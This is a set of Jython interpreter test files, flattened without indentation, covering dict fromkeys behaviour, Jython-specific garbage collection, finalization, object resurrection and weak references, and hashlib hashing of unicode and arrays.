# Based on test_dict.DictTest.test_fromkeys, without sub-classing stringmap
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc'), d)
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
# test fast path for dictionary inputs
d = Dict(zip(range(6), range(6)))
self.assertEqual(Dict.fromkeys(d, 0), Dict(zip(range(6), [0]*6)))
class JavaHashMapDictTest(NullAcceptingDictTest):
type2test = HashMap
class JavaLinkedHashMapDictTest(NullAcceptingDictTest):
type2test = LinkedHashMap
class JavaHashtableDictTest(NullRejectingDictTest):
type2test = Hashtable
class JavaConcurrentHashMapDictTest(NullRejectingDictTest):
type2test = ConcurrentHashMap
def test_main():
test_support.run_unittest(
DictInitTest,
DictCmpTest,
DictMiscTest,
DerivedDictTest,
JavaHashMapTest,
JavaLinkedHashMapTest,
JavaConcurrentHashMapTest,
JavaHashtableTest,
JavaDictTest,
PyStringMapDictTest,
JavaHashMapDictTest,
JavaLinkedHashMapDictTest,
JavaHashtableDictTest,
JavaConcurrentHashMapDictTest,
)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_gc_jy.py
```python
import unittest
from test import test_support
import time
import gc
import weakref
from Queue import Queue
try:
from java.lang import System, Runnable, Class, Object
from javatests import GCTestHelper
except ImportError:
#i.e. not Jython is running
pass
class GCTests_Jy_CyclicGarbage(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# In contrast to the tests in test_gc, these finalizer tests shall work
# even if gc-monitoring is disabled.
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
time.sleep(4)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@unittest.skipUnless(test_support.is_jython,
'CPython has no monitor state')
def test_manual_monitoring(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.monitorObject(l)
#gc.monitorObject(t) <- intentionally only monitor one of them
gc.collect()
del t
del l
# Note that usually two collected objects would be expected - l and t.
# But we intentionally only monitored one of them, so only one should
# be counted.
self.assertEqual(gc.collect(), 1)
@unittest.skipUnless(test_support.is_jython,
'CPython has no gc preprocess and postprocess features')
class GCTests_Jy_preprocess_and_postprocess(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
def test_finalization_preprocess_and_postprocess(self):
# Note that this test is done here again (already was in another class
# in this module), to see that everything works as it should also with
# a different flag-context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- to avoid that the newly registered processes
# become subject to previous run (remember: We
# are not in monitor-mode, i.e. gc runs async.
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- to avoid that the newly registered processes
# become subject to previous run (remember: We
# are not in monitor-mode, i.e. gc runs async.
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
#NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Delayed_Finalization(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# Tests from GCTests_Jy_preprocess_and_postprocess are repeated here
# without monitoring.
def test_finalization_preprocess_and_postprocess(self):
# Note that this test is done here again (already was in another class
# in this module), to see that everything works as it should also with
# a different flag-context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(2) # <- to avoid that the newly registered processes
# become subject to previous run
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- to avoid that the newly registered processes
# become subject to previous run (remember: We
# are not in monitor-mode, i.e. gc runs async.
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
# NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_delayedFinalization(self):
#time.sleep(2)
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.a = a
c.toResurrect = Test_Finalizable("d")
del a
del c
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
# Note that CPython would collect a, b and c in one run.
# With gc.DONT_FINALIZE_RESURRECTED_OBJECTS set, Jython
# Would not collect a and b in the same run with c
# because a and b might have been resurrected by c and
# Java allows not to detect such resurrection in any
# other way than waiting for the next gc-run.
self.assertIn('del c', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
self.assertIn('del a', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
self.assertIn('del b', comments)
self.assertEqual(1, len(comments))
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Forced_Delayed_Finalization(unittest.TestCase):
# Here we basically reproduce the ordinary delayed finalization test, but ensure
# that the FORCE_DELAYED_FINALIZATION-flag does not cause regressions with this.
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# Tests from GCTests_Jy_preprocess_and_postprocess are repeated here
# without monitoring but with forced flag.
def test_forced_finalization_preprocess_and_postprocess(self):
# Note that this test is done here again (already was in another class
# in this module), to see that everything works as it should also with
# a different flag-context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- to avoid that the newly registered processes
# become subject to previous run
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_forced_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- to avoid that the newly registered processes
# become subject to previous run (remember: We
# are not in monitor-mode, i.e. gc runs async.
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
#NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronous
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_forced_delayedFinalization(self):
#time.sleep(2)
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.a = a
c.toResurrect = Test_Finalizable("d")
del a
del c
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
# Note that CPython would collect a, b and c in one run.
# With gc.DONT_FINALIZE_RESURRECTED_OBJECTS set, Jython
# Would not collect a and b in the same run with c
# because a and b might have been resurrected by c and
# Java allows not to detect such resurrection in any
# other way than waiting for the next gc-run.
self.assertIn('del c', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
self.assertIn('del a', comments)
self.assertEqual(1, len(comments))
comments = []
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
self.assertIn('del b', comments)
self.assertEqual(1, len(comments))
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Raw_Forced_Delayed_Finalization(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.stopMonitoring()
#gc.addJythonGCFlags(gc.VERBOSE_DELAYED)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
def test_raw_forced_delayedFinalization(self):
#print "test_raw_forced_delayedFinalization"
comments = []
class Test_JavaAbortFinalizable(Object):
def __init__(self, name, toAbort):
self.name = name
self.toAbort = toAbort
def __repr__(self):
return "<"+self.name+">"
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
gc.abortDelayedFinalization(self.toAbort)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback(obj):
comments.append("callback0")
a = Test_Finalizable("a")
wa = weakref.ref(a, callback)
b = Test_JavaAbortFinalizable("b", a)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
self.assertTrue(gc.delayedFinalizationEnabled())
self.assertFalse(gc.delayedWeakrefCallbacksEnabled())
del a
del b
System.gc()
time.sleep(2)
self.assertIn('del b', comments)
self.assertEqual(2, len(comments))
self.assertIn('callback0', comments)
self.assertNotIn('del a', comments)
self.assertIsNone(wa())
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
def test_raw_forced_delayedWeakrefCallback(self):
comments = []
resurrected = []
class Test_JavaResurrectFinalizable(Object):
def __init__(self, name, toResurrect):
self.name = name
self.toResurrect = toResurrect
def __repr__(self):
return "<"+self.name+">"
# Note that this type of finalizer is usually not recommended
# as it gets lost in case of resurrection.
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
resurrected.append(self.toResurrect)
# We manually restore weak references:
gc.restoreWeakReferences(self.toResurrect)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback(obj):
comments.append("callback")
a = Test_Finalizable("a")
b = Test_JavaResurrectFinalizable("b", a)
wa = weakref.ref(a, callback)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.addJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
self.assertFalse(gc.delayedFinalizationEnabled())
self.assertTrue(gc.delayedWeakrefCallbacksEnabled())
self.assertEqual(len(comments), 0)
aStr = str(a)
del a
del b
System.gc()
time.sleep(2)
self.assertIn("del a", comments)
self.assertIn("del b", comments)
self.assertEqual(1, len(resurrected))
self.assertEqual(str(resurrected[0]), aStr)
self.assertIsNotNone(wa())
self.assertEqual(resurrected[0], wa())
self.assertNotIn("callback", comments)
self.assertEqual(2, len(comments))
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
def test_raw_forced_delayed(self):
comments = []
class Test_JavaAbortFinalizable(Object):
def __init__(self, name, toAbort):
self.name = name
self.toAbort = toAbort
def __repr__(self):
return "<"+self.name+">"
def finalize(self):
gc.notifyPreFinalization()
comments.append("del "+self.name)
gc.abortDelayedFinalization(self.toAbort)
# We manually restore weak references:
gc.restoreWeakReferences(self.toAbort)
gc.notifyPostFinalization()
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
def callback_a(obj):
comments.append("callback_a")
def callback_b(obj):
comments.append("callback_b")
a = Test_Finalizable("a")
wa = weakref.ref(a, callback_a)
b = Test_JavaAbortFinalizable("b", a)
wb = weakref.ref(b, callback_b)
gc.addJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.addJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
self.assertTrue(gc.delayedFinalizationEnabled())
self.assertTrue(gc.delayedWeakrefCallbacksEnabled())
self.assertEqual(len(comments), 0)
del a
del b
System.gc()
time.sleep(2)
self.assertIsNotNone(wa())
self.assertIsNone(wb())
self.assertIn('del b', comments)
self.assertNotIn('callback_a', comments)
self.assertIn('callback_b', comments)
self.assertNotIn('del a', comments)
self.assertEqual(2, len(comments))
gc.removeJythonGCFlags(gc.FORCE_DELAYED_FINALIZATION)
gc.removeJythonGCFlags(gc.FORCE_DELAYED_WEAKREF_CALLBACKS)
@unittest.skipIf(__name__ != "__main__", 'Hangs under regrtest')
class GCTests_Jy_Monitoring(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
# since gc module already exists, it would not be caught by monitorGlobal.
# so we have to monitor it manually:
gc.monitorObject(gc)
# the finalizer-related tests need this flag to pass in Jython:
# gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
@unittest.skipUnless(test_support.is_jython, 'CPython has no monitor-state.')
def test_monitor_status_after_delayed_finalization(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.toResurrect = a
a.b.a = a
self.assertTrue(gc.isMonitored(a))
self.assertTrue(gc.isMonitored(a.b))
self.assertTrue(gc.isMonitored(c))
gc.collect()
del a
del c
#gc.set_debug(gc.DEBUG_SAVEALL)
self.assertEqual(gc.collect(), 0) #c is not cyclic and a, b are resurrected,
#so nothing to count here
#self.asserEqual(len(gc.garbage), 0)
# if we called gc.set_debug(gc.DEBUG_SAVEALL) above, it would
# be okay for gc.garbage to be empty, because a and b
# are not finalized and c is not cyclic.
self.assertEqual(comments, ['del c'])
self.assertEqual(str(resurrect), "[<a>]")
self.assertTrue(gc.isMonitored(resurrect[0]))
self.assertTrue(gc.isMonitored(resurrect[0].b))
def test_notifyRerun_for_delayed_finalization(self):
gc.collect()
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
a = Test_Finalizable("a")
lst = []
lst1 = [lst]
lst.append(lst1)
a.b = Test_Finalizable("b")
a.b.lst = lst
del lst
del lst1
try:
self.assertTrue(gc.isMonitored(a))
self.assertTrue(gc.isMonitored(a.b))
except AttributeError:
pass
del a
self.assertEqual(gc.collect(), 2) # c is not cyclic and a, b are resurrected,
# the cycle of two lists is counted here
self.assertEqual(comments, ['del a', 'del b'])
class GCTests_Jy_Weakref(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.addJythonGCFlags(gc.PRESERVE_WEAKREFS_ON_RESURRECTION)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_weakref_after_resurrection(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
def clb(ref):
comments.append("clb")
def clb2(ref):
comments.append("clb2 "+str(comments))
a = Test_Finalizable("a")
wa = weakref.ref(a, clb)
self.assertEqual(wa(), a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c, clb2)
try:
gc.monitorObject(c)
except Exception:
pass
del a
del c
gc.collect()
self.assertIn('clb2 []', comments)
self.assertNotIn("clb", comments)
self.assertEqual(str(resurrect), "[<c>]")
self.assertEqual(str(wa()), "<a>")
self.assertEqual(wc(), None)
def test_weakref_after_resurrection_and_delayed_finalize(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
def clb(ref):
comments.append("clb")
def clb2(ref):
comments.append("clb2 "+str(comments))
a = Test_Finalizable("a")
wa = weakref.ref(a, clb)
self.assertEqual(wa(), a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c, clb2)
try:
gc.monitorObject(c)
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
except Exception:
pass
del a
del c
gc.collect()
self.assertIn('del c', comments)
self.assertNotIn('del a', comments)
self.assertIn('clb2 []', comments)
self.assertNotIn("clb", comments)
self.assertEqual(str(resurrect), "[<c>]")
self.assertEqual(str(wa()), "<a>")
self.assertEqual(wc(), None)
try:
gc.removeJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
except Exception:
pass
@unittest.skipUnless(test_support.is_jython, '')
def test_weakref_after_resurrection_threadsafe(self):
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self)
a = Test_Finalizable("a")
wa = weakref.ref(a)
c = Test_Resurrection("c")
c.toResurrect = a
wc = weakref.ref(c)
del a
del c
try:
gc.addJythonGCFlags(gc.PRESERVE_WEAKREFS_ON_RESURRECTION)
System.gc()
# We intentionally don't wait here, but want to observe
# the situation with gc unfinnished. Note that wa() preserves
# its result right away, due to thread-safe implementation.
# Technically, the weak reference breaks and is restored after
# gc-run finishes. However wa() blocks until the referent is
# restored or the deletion is confirmed.
except Exception:
pass
self.assertEqual(comments, [])
self.assertEqual(resurrect, [])
while comments == [] or resurrect == []:
self.assertEqual(str(wa()), '<a>')
self.assertEqual(wc(), None)
self.assertEqual(str(wa()), '<a>')
self.assertEqual(wc(), None)
@unittest.skipUnless(test_support.is_jython and test_support.get_java_version() < (9,),
"Test is specific to Java versions <9")
# From Java 9 onwards we get ugly warnings.
# See discussion in http://bugs.jython.org/issue2656
class GCTests_Jy_TraverseByReflection(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.removeJythonGCFlags(gc.DONT_TRAVERSE_BY_REFLECTION) # i.e. enable ...
gc.addJythonGCFlags(gc.SUPPRESS_TRAVERSE_BY_REFLECTION_WARNING)
gc.setMonitorGlobal(True)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
gc.stopMonitoring()
except Exception:
pass
def test_Field(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestField()
del prt
self.assertEqual(gc.collect(), 1)
def test_List(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestList()
del prt
self.assertEqual(gc.collect(), 1)
def test_Array(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestArray()
del prt
self.assertEqual(gc.collect(), 1)
def test_PyList(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestPyList()
del prt
self.assertEqual(gc.collect(), 2)
def test_Cycle(self):
gc.collect()
prt = GCTestHelper.reflectionTraverseTestCycle()
del prt
self.assertEqual(gc.collect(), 0)
@unittest.skipUnless(test_support.is_jython,
'''
The test involves Jython-specifics and is thus not supported by
non-Jython interpreters.
''')
class GCTests_Misc(unittest.TestCase):
# Test for issue 2337
def test_queue(self):
class X(object):
def __init__(self, q):
self.q = q
x = X(Queue())
gc.monitorObject(x)
gc.collect()
# Test for issue 2336
def test_gc_null(self):
WeakReferenceGC = Class.forName('org.python.modules.gc$WeakReferenceGC')
# We have to actually construct the right type, the constructor is protected
# and Jython doesn't expose that to us; we'd get a plain WeakReference
# if we tried WeakReferenceGC()
con = WeakReferenceGC.getDeclaredConstructors()[0]
con.setAccessible(True)
x = object()
ref = con.newInstance(x)
# It works to start with
self.assertTrue(ref == ref)
self.assertTrue(ref.get() is x)
# Now clean up the referent
del x
while ref.get():
gc.collect()
self.assertIsNone(ref.get())
# Boom!
self.assertTrue(ref == ref)
def test_main():
tests = (
GCTests_Jy_CyclicGarbage,
GCTests_Jy_preprocess_and_postprocess,
GCTests_Jy_Delayed_Finalization,
GCTests_Jy_Forced_Delayed_Finalization,
GCTests_Jy_Raw_Forced_Delayed_Finalization,
GCTests_Jy_Monitoring,
GCTests_Jy_Weakref,
GCTests_Jy_TraverseByReflection,
GCTests_Misc,
)
test_support.run_unittest(*tests)
if __name__ == "__main__":
unittest.main()
```
#### File: Lib/test/test_hashlib_jy.py
```python
import hashlib
import unittest
from array import array
from test import test_support
class HashlibTestCase(unittest.TestCase):
def test_unicode(self):
self.assertEqual(hashlib.md5(u'foo').hexdigest(),
'acbd18db4cc2f85cedef654fccc4a4d8')
self.assertRaises(UnicodeEncodeError, hashlib.md5, u'Gráin amháiñ')
def test_array(self):
self.assertEqual(hashlib.sha1(array('c', 'hovercraft')).hexdigest(),
'496df4d8de2c71973d7e917c4fbe57e6ad46d738')
intarray = array('i', range(5))
self.assertEqual(hashlib.sha1(intarray).hexdigest(),
hashlib.sha1(intarray.tostring()).hexdigest())
def test_main():
test_support.run_unittest(HashlibTestCase)
